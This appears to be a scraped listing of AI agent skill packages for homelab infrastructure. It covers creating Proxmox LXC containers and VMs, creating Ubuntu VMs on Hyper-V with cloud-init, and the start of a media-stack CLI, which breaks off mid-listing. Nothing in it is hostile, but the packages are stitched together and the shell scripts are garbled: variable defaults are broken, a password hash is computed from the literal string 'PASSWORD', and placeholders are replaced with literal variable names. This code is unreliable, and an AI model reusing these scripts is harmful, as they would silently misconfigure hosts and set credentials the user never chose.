| Extra packages | - | No |
## Prerequisites Check
```bash
# SSH to Proxmox
ssh proxmox-host "pveversion" || echo "FAIL: Cannot SSH to Proxmox host"
# Check template (LXC)
ssh proxmox-host "pveam list local | grep ubuntu-24.04" || echo "Template not cached, will download"
# Find next CTID
ssh proxmox-host "pct list" | tail -n +2 | awk '{print $1}' | sort -n | tail -1
# Use max + 1
```
## Execution Flow: LXC Container
### Step 1: Ensure template is cached
```bash
ssh proxmox-host "pveam list local | grep ubuntu-24.04 || pveam download local ubuntu-24.04-standard_24.04-2_amd64.tar.zst"
```
### Step 2: Find next available CTID
```bash
NEXT_CTID=$(ssh proxmox-host "cat <(pct list | tail -n +2 | awk '{print \$1}') <(qm list | tail -n +2 | awk '{print \$1}') 2>/dev/null | sort -n | tail -1")
NEXT_CTID=$((NEXT_CTID + 1))
```
### Step 3: Create container
```bash
ssh proxmox-host "pct create $CTID local:vztmpl/ubuntu-24.04-standard_24.04-2_amd64.tar.zst \
--hostname <name> \
--memory <ram> \
--cores <cores> \
--rootfs local-lvm:<disk> \
--net0 name=eth0,bridge=vmbr0,ip=dhcp \
--unprivileged 1 \
--features nesting=1 \
--start 1"
```
**Key flags:**
- `--unprivileged 1`: Security best practice
- `--features nesting=1`: Required for Docker inside LXC
- `--start 1`: Start immediately after creation
### Step 4: Wait for boot and get IP
```bash
sleep 10 # LXC boots in ~5 seconds
# Get IP from Proxmox
ssh proxmox-host "pct exec $CTID -- hostname -I"
# Or from DHCP
ssh proxmox-host "pct exec $CTID -- ip -4 addr show eth0 | grep inet | awk '{print \$2}' | cut -d/ -f1"
```
### Step 5: Post-boot Docker setup
```bash
bash scripts/post-boot-setup.sh proxmox-host $CTID
```
Or manually:
```bash
ssh proxmox-host "pct exec $CTID -- bash -c '
apt-get update -qq
apt-get install -y -qq docker.io curl git htop
systemctl enable docker && systemctl start docker
mkdir -p /usr/local/lib/docker/cli-plugins
curl -SL https://github.com/docker/compose/releases/latest/download/docker-compose-linux-x86_64 -o /usr/local/lib/docker/cli-plugins/docker-compose
chmod +x /usr/local/lib/docker/cli-plugins/docker-compose
'"
```
### Step 6: Verify
```bash
ssh proxmox-host "pct exec $CTID -- docker --version && pct exec $CTID -- docker compose version"
```
## Execution Flow: Full VM
Use `scripts/create-vm.sh` for full VMs when LXC won't work:
```bash
ssh proxmox-host "qm create $VMID --name <name> --memory <ram> --cores <cores> \
--net0 virtio,bridge=vmbr0 --scsihw virtio-scsi-pci \
--scsi0 local-lvm:<disk>,format=raw --ide2 local-lvm:cloudinit \
--boot c --bootdisk scsi0 --serial0 socket --vga serial0 \
--ciuser deploy --cipassword <password> --ipconfig0 ip=dhcp \
--start 1"
```
### Return Values
Report to caller:
```
Container/VM Created: <name>
CTID/VMID: <id>
Type: lxc | vm
IP: <ip>
SSH: root@<ip> (LXC) or deploy@<ip> (VM)
Docker: installed
Docker Compose v2: installed
```
## Teardown
```bash
# LXC
ssh proxmox-host "pct stop $CTID && pct destroy $CTID --purge"
# VM
ssh proxmox-host "qm stop $VMID && qm destroy $VMID --purge"
```
## Critical Gotchas
See `references/gotchas.md` for full details:
1. **Docker in LXC needs nesting=1**: Without `--features nesting=1`, Docker fails to create networks
2. **LXC limitations**: No custom kernel modules, no raw sockets (AF_PACKET). Use VM for Security Onion, Zeek
3. **Template caching**: `pveam download` is slow first time. Check `pveam list local` first
4. **CTID conflicts**: Always check `pct list` before picking a CTID
5. **Disk is thin-provisioned**: 770GB free in pool but containers can fill up fast
6. **Wazuh (CTID 105)**: 99.3% full at 25GB. Don't colocate storage-heavy services
FILE:README.md
# proxmox-create-vm
Create Ubuntu 24.04 LXC containers or full VMs on Proxmox VE. Docker-ready with Compose v2. Handles nesting for Docker-in-LXC and auto-picks CTIDs.
## What It Does
Reusable infrastructure skill. Creates the host, doesn't deploy applications. Pair with:
- `soc-deploy-thehive` for TheHive + Cortex
- `soc-deploy-misp` for MISP
- Any Docker-based deployment
Supports both LXC containers (default, fast, lightweight) and full VMs (for tools needing kernel access).
## Automation Includes
- Template download and caching
- Auto CTID/VMID selection
- LXC creation with Docker nesting support
- Full VM creation with cloud-init
- Post-boot Docker + Compose v2 setup
- IP discovery and SSH verification
- Clean teardown
## Requirements
- SSH access to a Proxmox VE host (root)
## Tags
proxmox, lxc, vm, ubuntu, infrastructure, automation, docker, homelab
FILE:references/defaults.md
# Defaults: Proxmox VM/Container Creation
## Host Info
| Parameter | Value |
|-----------|-------|
| Hostname | proxmox-host |
| IP | YOUR_PROXMOX_IP |
| SSH user | root |
| PVE version | 9.1.6 |
| CPU | Intel Ultra 9 285 |
| RAM | 32GB |
| Bridge | vmbr0 (DHCP) |
## Resource Budget
| Resource | Total | Used | Free |
|----------|-------|------|------|
| CPU cores | 24 | ~14 | ~10 |
| RAM | 32GB | ~22GB | ~10GB |
| Disk (LVM) | ~800GB | ~30GB | ~770GB |
## Existing Containers (as of March 2026)
| CTID | Name | Purpose | Notes |
|------|------|---------|-------|
| 100 | adguard | DNS ad blocking | |
| 101 | twingate-connector | Zero-trust VPN | |
| 102 | crafty-controller | Minecraft server | |
| 103 | homarr | Dashboard | |
| 105 | wazuh | SIEM | 99.3% disk full! |
| 109 | social-automation | n8n + Postiz | |
**Next CTID: 110+** (always verify with `pct list`)
## LXC Defaults
| Parameter | Default |
|-----------|---------|
| OS template | ubuntu-24.04-standard_24.04-2_amd64.tar.zst |
| Cores | 2 |
| RAM | 4096 MB |
| Disk | 8 GB |
| Network | eth0, vmbr0, DHCP |
| Unprivileged | Yes |
| Nesting | Yes (for Docker) |
## VM Defaults
| Parameter | Default |
|-----------|---------|
| OS | Ubuntu 24.04 cloud-init |
| Cores | 2 |
| RAM | 4096 MB |
| Disk | 20 GB |
| SCSI | virtio-scsi-pci |
| Network | virtio, vmbr0, DHCP |
| User | deploy |
FILE:references/gotchas.md
# Gotchas: Proxmox VM/Container Creation
## Docker in LXC Requires Nesting
- Without `--features nesting=1`, Docker fails to create overlay networks
- **Fix:** Always include `--features nesting=1` when the container will run Docker
- Unprivileged + nesting is the safe default
## LXC Can't Run Everything
- No custom kernel modules (iptables works, but kernel-level packet capture doesn't)
- No AF_PACKET raw sockets (needed by Zeek, Security Onion, tcpdump with advanced features)
- No /dev access for specialized hardware
- **Fix:** Use `qm` (full VM) instead of `pct` (LXC) for these use cases
## Template Caching
- `pveam download local <template>` is slow on first download (~2-5 min depending on connection)
- Always check `pveam list local` first to see if the template is cached
- Template name for Ubuntu 24.04: `ubuntu-24.04-standard_24.04-2_amd64.tar.zst`
## CTID/VMID Conflicts
- Proxmox uses numeric IDs for both containers (CTID) and VMs (VMID) in the same namespace
- **Fix:** Always check both `pct list` and `qm list` before picking an ID
- Use max(all IDs) + 1 for safety
## Disk Thin Provisioning
- Proxmox reports ~770GB free in the LVM pool
- But individual containers can fill up fast, especially logging and DB-heavy services
- Wazuh container (CTID 105) is at 99.3% / 25GB. Don't colocate storage-heavy services
- **Fix:** Monitor with `pct exec <CTID> -- df -h` and resize with `pct resize <CTID> rootfs +10G`
## LXC Root Access
- LXC containers default to root user (no separate user created)
- Access via `pct exec <CTID> -- bash` or SSH as root
- VMs use cloud-init with a deploy user
## Container Startup
- LXC containers boot in ~5 seconds
- Full VMs with cloud-init take ~60-90 seconds
- Template download (if needed) adds 2-5 minutes
## Network
- All containers/VMs on `vmbr0` bridge with DHCP
- IP assigned by network DHCP server
- For static IPs, use `--net0 name=eth0,bridge=vmbr0,ip=192.168.x.x/24,gw=192.168.x.1`
FILE:scripts/create-lxc.sh
#!/bin/bash
# Create an LXC container on Proxmox with Docker support
# Usage: ./create-lxc.sh <proxmox-host> <name> [cores] [ram-mb] [disk-gb]
set -euo pipefail
HOST="?Usage: $0 <proxmox-host> <name> [cores] [ram-mb] [disk-gb]"
NAME="?Usage: $0 <proxmox-host> <name> [cores] [ram-mb] [disk-gb]"
CORES="-2"
RAM="-4096"
DISK="-8"
TEMPLATE="ubuntu-24.04-standard_24.04-2_amd64.tar.zst"
echo "=== Creating LXC: $NAME on $HOST ==="
echo " Cores: $CORES | RAM: RAMMB | Disk: DISKGB"
# Ensure template is cached
echo "[1/5] Checking template..."
if ! ssh "$HOST" "pveam list local" 2>/dev/null | grep -q "$TEMPLATE"; then
echo " Downloading template (this may take a few minutes)..."
ssh "$HOST" "pveam download local $TEMPLATE"
else
echo " Template cached."
fi
# Find next CTID
echo "[2/5] Finding next CTID..."
CTID=$(ssh "$HOST" "{ pct list 2>/dev/null | tail -n +2 | awk '{print \$1}'; qm list 2>/dev/null | tail -n +2 | awk '{print \$1}'; } | sort -n | tail -1")
CTID=$((CTID + 1))
echo " Using CTID: $CTID"
# Create container
echo "[3/5] Creating container..."
ssh "$HOST" "pct create $CTID local:vztmpl/$TEMPLATE \
--hostname $NAME \
--memory $RAM \
--cores $CORES \
--rootfs local-lvm:$DISK \
--net0 name=eth0,bridge=vmbr0,ip=dhcp \
--unprivileged 1 \
--features nesting=1 \
--start 1"
# Wait for boot
echo "[4/5] Waiting for boot..."
sleep 10
# Get IP
echo "[5/5] Getting IP..."
IP=$(ssh "$HOST" "pct exec $CTID -- hostname -I 2>/dev/null" | awk '{print $1}')
echo ""
echo "=== LXC Created ==="
echo "Name: $NAME"
echo "CTID: $CTID"
echo "IP: -pending (check in a few seconds)"
echo "Access: ssh $HOST \"pct exec $CTID -- bash\""
echo ""
echo "Next: Run post-boot-setup.sh to install Docker"
FILE:scripts/create-vm.sh
#!/bin/bash
# Create a full VM on Proxmox with cloud-init
# Usage: ./create-vm.sh <proxmox-host> <name> <password> [cores] [ram-mb] [disk-gb]
set -euo pipefail
HOST="?Usage: $0 <proxmox-host> <name> <password> [cores] [ram-mb] [disk-gb]"
NAME="?Usage: $0 <proxmox-host> <name> <password> [cores] [ram-mb] [disk-gb]"
PASSWORD="?Usage: $0 <proxmox-host> <name> <password> [cores] [ram-mb] [disk-gb]"
CORES="-2"
RAM="-4096"
DISK="-20"
echo "=== Creating VM: $NAME on $HOST ==="
echo " Cores: $CORES | RAM: RAMMB | Disk: DISKGB"
# Find next VMID
echo "[1/4] Finding next VMID..."
VMID=$(ssh "$HOST" "{ pct list 2>/dev/null | tail -n +2 | awk '{print \$1}'; qm list 2>/dev/null | tail -n +2 | awk '{print \$1}'; } | sort -n | tail -1")
VMID=$((VMID + 1))
echo " Using VMID: $VMID"
# Download cloud image if needed
echo "[2/4] Checking cloud image..."
ssh "$HOST" "ls /var/lib/vz/template/iso/ubuntu-24.04-cloud.img 2>/dev/null" || {
echo " Downloading cloud image..."
ssh "$HOST" "wget -q https://cloud-images.ubuntu.com/releases/24.04/release/ubuntu-24.04-server-cloudimg-amd64.img -O /var/lib/vz/template/iso/ubuntu-24.04-cloud.img"
}
# Create VM
echo "[3/4] Creating VM..."
ssh "$HOST" "qm create $VMID --name $NAME --memory $RAM --cores $CORES \
--net0 virtio,bridge=vmbr0 --scsihw virtio-scsi-pci \
--scsi0 local-lvm:$DISK,format=raw --ide2 local-lvm:cloudinit \
--boot c --bootdisk scsi0 --serial0 socket --vga serial0 \
--ciuser deploy --cipassword '$PASSWORD' --ipconfig0 ip=dhcp"
# Import cloud image disk
ssh "$HOST" "qm importdisk $VMID /var/lib/vz/template/iso/ubuntu-24.04-cloud.img local-lvm"
# Start
echo "[4/4] Starting VM..."
ssh "$HOST" "qm start $VMID"
echo ""
echo "=== VM Created ==="
echo "Name: $NAME"
echo "VMID: $VMID"
echo "User: deploy / $PASSWORD"
echo "Wait ~90 seconds for cloud-init, then check IP"
FILE:scripts/destroy.sh
#!/bin/bash
# Destroy a Proxmox container or VM
# Usage: ./destroy.sh <proxmox-host> <ctid-or-vmid> [type: lxc|vm]
set -euo pipefail
HOST="?Usage: $0 <proxmox-host> <id> [lxc|vm]"
ID="?Usage: $0 <proxmox-host> <id> [lxc|vm]"
TYPE="-lxc"
echo "=== Destroying $TYPE $ID on $HOST ==="
if [ "$TYPE" = "lxc" ]; then
ssh "$HOST" "pct stop $ID 2>/dev/null; pct destroy $ID --purge"
elif [ "$TYPE" = "vm" ]; then
ssh "$HOST" "qm stop $ID 2>/dev/null; qm destroy $ID --purge"
else
echo "ERROR: Type must be 'lxc' or 'vm'"
exit 1
fi
echo "=== $TYPE $ID destroyed ==="
FILE:scripts/find-ip.sh
#!/bin/bash
# Get IP address of a Proxmox container or VM
# Usage: ./find-ip.sh <proxmox-host> <id> [type: lxc|vm]
set -euo pipefail
HOST="?Usage: $0 <proxmox-host> <id> [lxc|vm]"
ID="?Usage: $0 <proxmox-host> <id> [lxc|vm]"
TYPE="-lxc"
if [ "$TYPE" = "lxc" ]; then
IP=$(ssh "$HOST" "pct exec $ID -- hostname -I 2>/dev/null" | awk '{print $1}')
elif [ "$TYPE" = "vm" ]; then
IP=$(ssh "$HOST" "qm guest cmd $ID network-get-interfaces 2>/dev/null" | grep -oP '"ip-address"\s*:\s*"\K[0-9.]+' | head -1)
if [ -z "$IP" ]; then
echo "VM guest agent not responding. Try ARP scan:"
echo " arp -a | grep the VM's MAC address"
exit 1
fi
fi
if [ -n "$IP" ]; then
echo "$IP"
else
echo "Could not determine IP. The container/VM may still be booting."
exit 1
fi
FILE:scripts/post-boot-setup.sh
#!/bin/bash
# Install Docker + Compose v2 inside a Proxmox LXC container
# Usage: ./post-boot-setup.sh <proxmox-host> <ctid> [extra-packages]
set -euo pipefail
HOST="?Usage: $0 <proxmox-host> <ctid> [extra-packages]"
CTID="?Usage: $0 <proxmox-host> <ctid> [extra-packages]"
EXTRA="-"
echo "=== Post-boot setup for CTID $CTID ==="
echo "[1/3] Installing base packages..."
ssh "$HOST" "pct exec $CTID -- bash -c '
export DEBIAN_FRONTEND=noninteractive
apt-get update -qq
apt-get install -y -qq docker.io curl git htop $EXTRA
'"
echo "[2/3] Installing Docker Compose v2..."
ssh "$HOST" "pct exec $CTID -- bash -c '
systemctl enable docker
systemctl start docker
mkdir -p /usr/local/lib/docker/cli-plugins
curl -SL https://github.com/docker/compose/releases/latest/download/docker-compose-linux-x86_64 -o /usr/local/lib/docker/cli-plugins/docker-compose
chmod +x /usr/local/lib/docker/cli-plugins/docker-compose
'"
echo "[3/3] Verifying..."
ssh "$HOST" "pct exec $CTID -- docker --version"
ssh "$HOST" "pct exec $CTID -- docker compose version"
echo ""
echo "=== Setup complete for CTID $CTID ==="
Create Ubuntu 24.04 VMs on Windows Hyper-V from cloud images with cloud-init. Handles all the gotchas: sparse VHDX fix, hv_netvsc network config, permissions...
---
name: hyperv-create-vm
version: 1.0.0
description: "Create Ubuntu 24.04 VMs on Windows Hyper-V from cloud images with cloud-init. Handles all the gotchas: sparse VHDX fix, hv_netvsc network config, permissions, Secure Boot, and Docker Compose v2. Returns a Docker-ready VM with SSH access."
tags:
- hyper-v
- vm
- ubuntu
- cloud-init
- infrastructure
- automation
- windows
category: infrastructure
requires:
env:
- name: VM_PASSWORD
description: "Password for the VM's deploy user. Read via env var or stdin (never CLI args)."
required: false
credentials:
- name: SSH access to Hyper-V host
description: "SSH key or password auth to the Windows Hyper-V host for remote PowerShell execution."
required: true
- name: Hyper-V admin privileges
description: "The SSH user must be able to run elevated PowerShell (Hyper-V cmdlets, fsutil, icacls)."
required: true
tools:
- name: genisoimage
description: "Required on the Linux build host to create cloud-init ISOs."
install: "apt install genisoimage"
- name: qemu-img
description: "Required on the Windows Hyper-V host for qcow2-to-VHDX conversion."
install: "choco install qemu -y"
files:
- SKILL.md
- README.md
- scripts/build-cidata-iso.sh
- scripts/create-vm.ps1
- scripts/destroy-vm.ps1
- scripts/find-vm-ip.ps1
- scripts/cloud-init-user-data.yaml
- scripts/cloud-init-meta-data.yaml
- scripts/cloud-init-network-config.yaml
- references/defaults.md
- references/gotchas.md
---
# Hyper-V VM Creator
Create Ubuntu 24.04 VMs on Windows Hyper-V from cloud images with cloud-init. Returns a Docker-ready VM with SSH access.
## When to Use
- "create hyper-v vm"
- "spin up vm on hyper-v"
- "new hyper-v ubuntu vm"
- Any time you need a fresh Linux VM on a Windows Hyper-V host
This is a **base skill**. It creates the VM. Other skills (soc-deploy-thehive, soc-deploy-misp) deploy applications onto it.
## User Inputs
| Parameter | Default | Required |
|-----------|---------|----------|
| VM name | - | Yes |
| Hyper-V host | hyperv-host (YOUR_HYPERV_IP) | No |
| CPU cores | 2 | No |
| RAM | 4GB | No |
| Disk | 40GB | No |
| VM user password | (generated) | No |
| Extra cloud-init packages | - | No |
| Network switch | DNS-NIC-Switch | No |
## Prerequisites Check
```bash
# SSH to Hyper-V host
ssh hyperv-host "echo OK" 2>/dev/null || echo "FAIL: Cannot SSH to Hyper-V host"
# qemu-img on Windows
ssh hyperv-host 'where "C:\Program Files\qemu\qemu-img.exe"' 2>/dev/null || echo "FAIL: qemu-img not installed (choco install qemu -y)"
# genisoimage on Linux (for building cloud-init ISO)
which genisoimage || echo "FAIL: genisoimage not installed (apt install genisoimage)"
```
## Execution Flow
### Step 1: Build cloud-init ISO (on Linux)
```bash
# Password via env var (recommended, avoids shell history/process list exposure)
VM_PASSWORD="<password>" bash scripts/build-cidata-iso.sh <vm-name> [ssh-public-key]
# Or via stdin
echo "<password>" | bash scripts/build-cidata-iso.sh <vm-name> [ssh-public-key]
# Creates /tmp/<vm-name>-cidata.iso
```
The ISO contains three files:
- `user-data`: deploy user, Docker, Compose v2, SSH password auth
- `meta-data`: instance-id and hostname
- `network-config`: hv_netvsc DHCP match (CRITICAL for Hyper-V networking)
### Step 2: Transfer files to Hyper-V host
```bash
# Cloud image (if not already cached)
wget -q https://cloud-images.ubuntu.com/releases/24.04/release/ubuntu-24.04-server-cloudimg-amd64.img -O /tmp/ubuntu-24.04-cloud.img
scp /tmp/ubuntu-24.04-cloud.img hyperv-host:C:/Users/youruser/Downloads/
# Cloud-init ISO
scp /tmp/<vm-name>-cidata.iso hyperv-host:C:/Users/youruser/Downloads/
```
### Step 3: Create VM (elevated PowerShell on Hyper-V host)
```bash
# Copy script to host
scp scripts/create-vm.ps1 hyperv-host:C:/Users/youruser/Downloads/
# Execute (needs elevation)
ssh hyperv-host "powershell -ExecutionPolicy Bypass -File C:\\Users\\youruser\\Downloads\\create-vm.ps1 \
-VMName <vm-name> \
-CloudInitISO C:\\Users\\youruser\\Downloads\\<vm-name>-cidata.iso \
-DiskSizeGB <disk> -MemoryGB <ram> -CPUCount <cores>"
```
### Step 4: Wait for boot and find IP
```bash
sleep 90 # Cloud-init needs ~90 seconds
# Hyper-V VMs have MACs starting with 00-15-5d
arp -a | grep "00-15-5d"
# Get VM MAC to match
ssh hyperv-host "powershell (Get-VMNetworkAdapter -VMName '<vm-name>').MacAddress"
# PowerShell shows: 00155D38010A
# ARP shows: 00-15-5d-38-01-0a
```
### Step 5: Verify SSH and Docker
```bash
ssh deploy@<ip> "docker --version && docker compose version && echo 'VM READY'"
```
### Return Values
Report to caller:
```
VM Created: <vm-name>
IP: <ip>
SSH: deploy@<ip> (password: <password>)
Docker: installed
Docker Compose v2: installed
```
## Teardown
To destroy a VM completely:
```bash
ssh hyperv-host "powershell -Command \"Stop-VM -Name '<vm-name>' -Force -TurnOff; Remove-VM -Name '<vm-name>' -Force; Remove-Item 'C:\\ProgramData\\Microsoft\\Windows\\Virtual Hard Disks\\<vm-name>.vhdx' -Force\""
```
Or use `scripts/destroy-vm.ps1`:
```bash
scp scripts/destroy-vm.ps1 hyperv-host:C:/Users/youruser/Downloads/
ssh hyperv-host "powershell -ExecutionPolicy Bypass -File C:\\Users\\youruser\\Downloads\\destroy-vm.ps1 -VMName <vm-name>"
```
## Critical Gotchas
See `references/gotchas.md` for full details. Top blockers:
1. **Sparse VHDX**: `fsutil sparse setflag <path> 0` BEFORE `Resize-VHD` or error 0xC03A001A
2. **Network config**: Must include `match: driver: hv_netvsc` or VM gets no IP
3. **Permissions**: `icacls /grant "NT VIRTUAL MACHINE\Virtual Machines:(F)"` or Start-VM fails
4. **Secure Boot Off**: Ubuntu cloud images aren't signed for Hyper-V
5. **Cloud-init runs once**: No redo. Delete VM + VHDX and start over
6. **Don't batch PowerShell**: Run Hyper-V commands one at a time
7. **All commands need elevated PowerShell**
8. **Docker Compose v2**: Install via curl in runcmd, NOT apt
9. **IP discovery**: Use ARP scan, not Get-VMNetworkAdapter (needs linux-tools-virtual)
FILE:README.md
# hyperv-create-vm
Create Ubuntu 24.04 VMs on Windows Hyper-V from cloud images with cloud-init. Handles all the gotchas (sparse VHDX, network config, permissions, Compose v2). Returns a Docker-ready VM with SSH access.
## What It Does
Reusable VM creation skill. Creates the infrastructure, doesn't deploy applications. Pair with:
- `soc-deploy-thehive` for TheHive + Cortex
- `soc-deploy-misp` for MISP
- Any Docker-based deployment
## Automation Includes
- Ubuntu cloud image download and VHDX conversion
- Sparse flag fix (the #1 Hyper-V gotcha)
- Cloud-init ISO with Docker, Compose v2, SSH access
- hv_netvsc network config (mandatory for Hyper-V)
- VM creation, permissions, and startup
- IP discovery via ARP scan
- SSH verification
## Requirements
- SSH access to a Windows Hyper-V host
- `qemu-img` on the Hyper-V host (`choco install qemu -y`)
- `genisoimage` on the agent's Linux host
## Tags
hyper-v, vm, ubuntu, cloud-init, infrastructure, automation, windows
FILE:references/defaults.md
# Defaults: Hyper-V VM Creation
## VM Specs
| Parameter | Default | Notes |
|-----------|---------|-------|
| OS | Ubuntu 24.04 LTS | Cloud image (qcow2) |
| Generation | 2 | Required for UEFI boot |
| CPU | 2 cores | |
| RAM | 4 GB | |
| Disk | 40 GB | |
| Network switch | DNS-NIC-Switch | |
| VM user | deploy | |
| Secure Boot | Off | Cloud images unsigned |
| Auto checkpoints | Off | Prevents disk bloat |
## File Paths (Hyper-V Host)
| Item | Path |
|------|------|
| Cloud image cache | `C:\Users\youruser\Downloads\ubuntu-24.04-cloud.img` |
| VHDX storage | `C:\ProgramData\Microsoft\Windows\Virtual Hard Disks\` |
| Cloud-init ISOs | `C:\Users\youruser\Downloads\` |
| qemu-img | `C:\Program Files\qemu\qemu-img.exe` |
## Cloud Image URL
```
https://cloud-images.ubuntu.com/releases/24.04/release/ubuntu-24.04-server-cloudimg-amd64.img
```
## Installed via Cloud-Init
- docker.io
- curl
- git
- htop
- Docker Compose v2 plugin (via curl, not apt)
- SSH password auth disabled (key-only by default)
FILE:references/gotchas.md
# Gotchas: Hyper-V VM Creation
## VHDX Sparse Flag (Showstopper)
- `qemu-img convert` creates VHDX with NTFS sparse attribute
- Hyper-V refuses to start or resize sparse VHDX (error `0xC03A001A`)
- **Fix:** `fsutil sparse setflag "<path>.vhdx" 0` BEFORE Resize-VHD
- **Order matters:** sparse removal -> resize -> permissions -> create VM
## Cloud-Init Network Config (Showstopper)
- Hyper-V NICs use the `hv_netvsc` driver
- Interface names vary between image versions (eth0, ens1, etc.)
- Without a network-config file, VM boots with zero networking
- **Fix:** Match by driver, not interface name:
```yaml
version: 2
ethernets:
id0:
match:
driver: hv_netvsc
dhcp4: true
```
## File Permissions
- Hyper-V service account needs explicit VHDX access
- **Fix:** `icacls "<path>.vhdx" /grant "NT VIRTUAL MACHINE\Virtual Machines:(F)"`
- Without this, Start-VM fails with "Access denied"
## Secure Boot
- Ubuntu cloud images aren't signed for Hyper-V Secure Boot
- **Fix:** `Set-VMFirmware -VMName <name> -EnableSecureBoot Off`
## Cloud-Init Runs Once
- If cloud-init completes (even with errors), it won't re-run on reboot
- No "retry" mechanism exists
- **Fix:** Delete VM, delete VHDX, reconvert from cloud image, start over
## PowerShell Batching
- Running multiple Hyper-V cmdlets in rapid succession causes intermittent failures
- **Fix:** Execute one command at a time with error checking between each
## Elevated PowerShell Required
- All Hyper-V commands and `fsutil` need admin elevation
- For automation, use: `powershell -ExecutionPolicy Bypass -File script.ps1`
## Docker Compose v2
- Cloud-init must install Compose v2 plugin via curl, NOT via apt
- `apt install docker-compose` installs v1 which is broken with modern images
- **Fix:** curl the compose plugin binary into `/usr/local/lib/docker/cli-plugins/`
## IP Discovery
- `(Get-VMNetworkAdapter -VMName <name>).IPAddresses` returns empty without guest integration services
- Cloud images don't have `linux-tools-virtual` or `hyperv-daemons` installed
- **Fix:** ARP scan: `arp -a | grep "00-15-5d"` and match MAC from PowerShell
- PowerShell MAC format: `00155D38010A`, ARP format: `00-15-5d-38-01-0a`
FILE:scripts/build-cidata-iso.sh
#!/bin/bash
# Build cloud-init ISO for Hyper-V VM
# Usage: VM_PASSWORD=<pass> ./build-cidata-iso.sh <vm-name> [ssh-public-key] [extra-packages]
# Or: echo <pass> | ./build-cidata-iso.sh <vm-name> [ssh-public-key] [extra-packages]
#
# Password is read from VM_PASSWORD env var or stdin to avoid exposure
# in process lists and shell history.
set -euo pipefail
VM_NAME="?Usage: VM_PASSWORD=<pass> $0 <vm-name> [ssh-public-key] [extra-packages]"
SSH_KEY="-$(cat ~/.ssh/id_ed25519.pub 2>/dev/null || echo 'NO_KEY')"
EXTRA_PKGS="-"
# Read password from env var or stdin (never CLI args)
if [ -n "-" ]; then
PASSWORD="$VM_PASSWORD"
elif [ ! -t 0 ]; then
read -r PASSWORD
else
read -rsp "VM password: " PASSWORD
echo
fi
if [ -z "$PASSWORD" ]; then
echo "ERROR: No password provided. Set VM_PASSWORD or pipe via stdin." >&2
exit 1
fi
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
WORK_DIR="/tmp/VM_NAME-cidata"
OUTPUT="/tmp/VM_NAME-cidata.iso"
echo "Building cloud-init ISO for: $VM_NAME"
# Generate password hash
PASS_HASH=$(python3 -c "import crypt; print(crypt.crypt('PASSWORD', crypt.mksalt(crypt.METHOD_SHA512)))")
# Create working directory
rm -rf "$WORK_DIR"
mkdir -p "$WORK_DIR"
# Generate user-data from template
sed \
-e "s|VM_NAME_PLACEHOLDER|VM_NAME|g" \
-e "s|PASSWORD_HASH_PLACEHOLDER|PASS_HASH|g" \
-e "s|SSH_KEY_PLACEHOLDER|SSH_KEY|g" \
"$SCRIPT_DIR/cloud-init-user-data.yaml" > "$WORK_DIR/user-data"
# Add extra packages if specified
if [ -n "$EXTRA_PKGS" ]; then
for pkg in $(echo "$EXTRA_PKGS" | tr ',' ' '); do
echo " - $pkg" >> "$WORK_DIR/user-data"
done
fi
# Generate meta-data from template
sed "s|VM_NAME_PLACEHOLDER|VM_NAME|g" \
"$SCRIPT_DIR/cloud-init-meta-data.yaml" > "$WORK_DIR/meta-data"
# Copy network config
cp "$SCRIPT_DIR/cloud-init-network-config.yaml" "$WORK_DIR/network-config"
# Build ISO
genisoimage -output "$OUTPUT" -volid cidata -joliet -rock \
"$WORK_DIR/user-data" "$WORK_DIR/meta-data" "$WORK_DIR/network-config"
echo "ISO created: $OUTPUT"
echo "SCP to Hyper-V host: scp $OUTPUT hyperv-host:C:/Users/youruser/Downloads/"
FILE:scripts/cloud-init-meta-data.yaml
instance-id: VM_NAME_PLACEHOLDER-001
local-hostname: VM_NAME_PLACEHOLDER
FILE:scripts/cloud-init-network-config.yaml
version: 2
ethernets:
id0:
match:
driver: hv_netvsc
dhcp4: true
dhcp6: false
FILE:scripts/cloud-init-user-data.yaml
#cloud-config
hostname: VM_NAME_PLACEHOLDER
manage_etc_hosts: true
users:
- name: deploy
sudo: ALL=(ALL) NOPASSWD:ALL
shell: /bin/bash
lock_passwd: false
passwd: PASSWORD_HASH_PLACEHOLDER
ssh_authorized_keys:
- SSH_KEY_PLACEHOLDER
packages:
- docker.io
- curl
- git
- htop
runcmd:
- systemctl enable docker
- systemctl start docker
- usermod -aG docker deploy
- mkdir -p /usr/local/lib/docker/cli-plugins
# Pin Compose version for reproducibility. Update this when upgrading.
- curl -SL "https://github.com/docker/compose/releases/download/v2.32.4/docker-compose-linux-x86_64" -o /usr/local/lib/docker/cli-plugins/docker-compose
- chmod +x /usr/local/lib/docker/cli-plugins/docker-compose
# SSH password auth disabled by default for security (key-only access).
# Set to true only if you need password-based SSH login.
ssh_pwauth: false
Single-file bash CLI for the *arr media stack with SSH remote support. For agents running on a different machine than the media services (e.g., VPS agent man...
--- name: media-cli version: 1.0.0 description: "Single-file bash CLI for the *arr media stack with SSH remote support. For agents running on a different machine than the media services (e.g., VPS agent managing a home server). Tunnels API calls through existing SSH config so services stay on localhost and are never exposed. If your agent and services are on the same machine, use media-cli-local instead." tags: - media - sonarr - radarr - plex - jellyfin - torrents - automation - homelab - arr category: tools --- # media-cli — Terminal Control for Your *arr Media Stack (Remote) One bash script to manage your entire media automation stack from a remote machine. Search, add, download, and monitor movies and TV shows without touching a web UI. Built for setups where the AI agent runs on a different host than the media services (e.g., a VPS running OpenClaw managing a home server's *arr stack). If everything runs on the same machine, use [media-cli-local](https://clawhub.com/solomonneas/media-cli-local) instead. **Source:** https://github.com/solomonneas/media-cli **Install:** Clone the repo and run the install script, or copy the `media` file to your PATH manually. See the GitHub README for details. ## Supported Services | Service | Required | What It Does | |---------|----------|-------------| | Sonarr | Yes | TV show management | | Radarr | Yes | Movie management | | Prowlarr | Yes | Indexer management | | qBittorrent | Yes | Download monitoring | | Bazarr | Optional | Subtitles | | Jellyseerr | Optional | User requests + trending | | Tdarr | Optional | Transcode monitoring | ## Setup ```bash # Install (clone and review the script first) git clone https://github.com/solomonneas/media-cli.git cd media-cli bash install.sh # Configure (interactive wizard) media setup # Test media status ``` The setup wizard asks for API URLs and keys, saves to `~/.config/media-cli/config` (chmod 600). ## Commands ### Movies ```bash media movies search "Interstellar" # Search online media movies add "Interstellar" # Add + start downloading media movies list # Library with download status media movies missing # Monitored without files media movies remove "title" # Remove (keeps files) ``` ### TV Shows ```bash media shows search "Breaking Bad" # Search online media shows add "Breaking Bad" # Add + search episodes media shows list # Library with episode counts ``` ### Downloads ```bash media downloads # All torrents by state media downloads active # Active with speed + ETA media downloads pause <hash|all> 